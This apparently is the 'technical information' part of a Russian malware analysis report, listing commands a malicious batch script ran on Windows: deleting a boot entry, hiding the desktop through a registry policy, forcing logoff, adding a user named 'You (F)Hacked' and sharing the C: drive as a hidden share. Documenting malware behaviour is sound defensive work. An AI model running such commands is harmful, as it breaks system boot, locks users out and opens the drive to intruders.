Техническая информация
- '<SYSTEM32>\bootcfg.exe' /delete /id 1
- '<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
- '<SYSTEM32>\logonui.exe' /status
- '<SYSTEM32>\shutdown.exe' -l -t 1 -c "rofl" -f
- '<SYSTEM32>\chcp.com' 1251
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\bat.bat
- '<SYSTEM32>\net1.exe' user "You (F)Hacked" /add
- '<SYSTEM32>\net1.exe' share "ResName$"="C:\"
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDesktop' = '00000001'
- <SYSTEM32>\bat.bat
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'StatusWindowClass' WindowName: '(null)'